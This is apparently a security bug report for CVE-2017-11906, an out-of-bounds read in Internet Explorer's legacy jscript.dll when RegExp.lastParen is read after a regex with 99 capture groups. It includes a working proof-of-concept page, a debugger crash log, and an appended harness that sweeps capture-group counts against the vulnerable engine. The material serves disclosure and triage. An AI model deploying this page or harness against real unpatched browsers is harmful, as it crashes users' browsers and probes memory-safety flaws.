Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen

CVE-2017-11906

There is an out-of-bounds read in the jscript.dll library (used in IE, WPAD and other places).

PoC for IE (note: page heap might be required to observe the crash; the IE=8 document mode and the Jscript.Encode script language make the page run on the legacy jscript.dll engine rather than on jscript9/Chakra):

=========================================
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
function go() {
  // Array(100).join('()') repeats the separator 99 times, i.e. 99 empty capture groups
  var r= new RegExp(Array(100).join('()'));
  // an empty subject matches every empty group, so all captures are populated
  ''.search(r);
  // reading the legacy lastParen static is where the out-of-bounds read happens
  alert(RegExp.lastParen);
}
go();
</script>
=========================================

Debug log:

=========================================
(cec.a14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
0:014> r
rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063
rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0
rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148
 r8=00000000130f9210  r9=0000000000000000 r10=000000000463fef0
r11=000000000463ff38 r12=0000000000000083 r13=0000000000000000
r14=00000000130f9210 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
0:014> k
 # Child-SP          RetAddr           Call Site
00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43
01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5
02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873
03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373
04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3
06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6
08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7
0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e
0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a
0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267
0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56
0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f
10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9
11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283
12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101
13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235
14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90
15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb
16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f
17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70
18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1
19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41
1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240
1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
=========================================

At the faulting instruction rcx=0x63 (99) equals the number of capture groups in the PoC, and the read at rbx+rcx*8+0xAC (0x04770154) lands past the end of the page-heap allocation at rbx=0x0476fd90, in the unmapped guard page, which is why page heap makes the crash reliable.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: ifratric
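The following is an added triage harness, not code from the report or from jscript.dll. It generalises the PoC so the capture-group count can be varied and the legacy RegExp.lastParen value inspected after each search; the function names (buildRegex, countCaptureGroups, makeInput, lastParenAfter, sweep, originalPocGroupCount) and the A..Z input string are my own assumptions. It relies only on standard ECMAScript plus the non-standard RegExp.lastParen static, which both jscript.dll and V8 expose, so on a correct engine it returns the last group's capture and on the vulnerable jscript.dll the property read inside lastParenAfter is the point where RegExpFncObj::LastParen faults.

```javascript
// Added example (not part of the original report): parameterised variant of the PoC.

// Build a pattern of exactly n capture groups. Array(n + 1).join(s) repeats s n times,
// which is why the original PoC's Array(100).join('()') contains 99 groups, not 100.
// With empty=false every group captures one character so lastParen has a visible value.
function buildRegex(n, empty) {
  return new RegExp(Array(n + 1).join(empty ? '()' : '(.)'));
}

// Count capture groups without parsing the pattern: append an empty alternative and
// match the empty string; exec() then returns one slot per group plus the whole match.
function countCaptureGroups(re) {
  return new RegExp(re.source + '|').exec('').length - 1;
}

// Constructed input for the non-empty variant: n characters cycling through A..Z,
// so group i captures a predictable character and the last group's is easy to check.
function makeInput(n) {
  var out = '';
  for (var i = 0; i < n; i++) out += String.fromCharCode(0x41 + (i % 26));
  return out;
}

// Run one search with n groups and read lastParen immediately afterwards (before any
// other regex operation overwrites the legacy statics). A correct engine returns the
// text captured by group n; in the vulnerable jscript.dll this read is the crash site.
function lastParenAfter(n, empty) {
  var re = buildRegex(n, empty);
  var input = empty ? '' : makeInput(n);
  var index = input.search(re);
  var last = RegExp.lastParen;
  return { groups: countCaptureGroups(re), index: index, lastParen: last };
}

// Sweep a list of group counts. In IE under page heap the first count whose read runs
// past the allocation kills the tab, which bisects the boundary; elsewhere it just
// collects the results for inspection.
function sweep(counts, empty) {
  var results = [];
  for (var i = 0; i < counts.length; i++) {
    results.push(lastParenAfter(counts[i], empty));
  }
  return results;
}

// Group count of the exact pattern used in the original PoC.
function originalPocGroupCount() {
  return countCaptureGroups(new RegExp(Array(100).join('()')));
}
```

To use it against the vulnerable engine, drop it into the same IE=8 / Jscript.Encode wrapper as the PoC and call sweep([1, 10, 50, 99, 100], true) with page heap enabled; the smallest count that faults is the boundary the LastParen code fails to check. Under Node or a patched engine the same call only confirms the expected semantics.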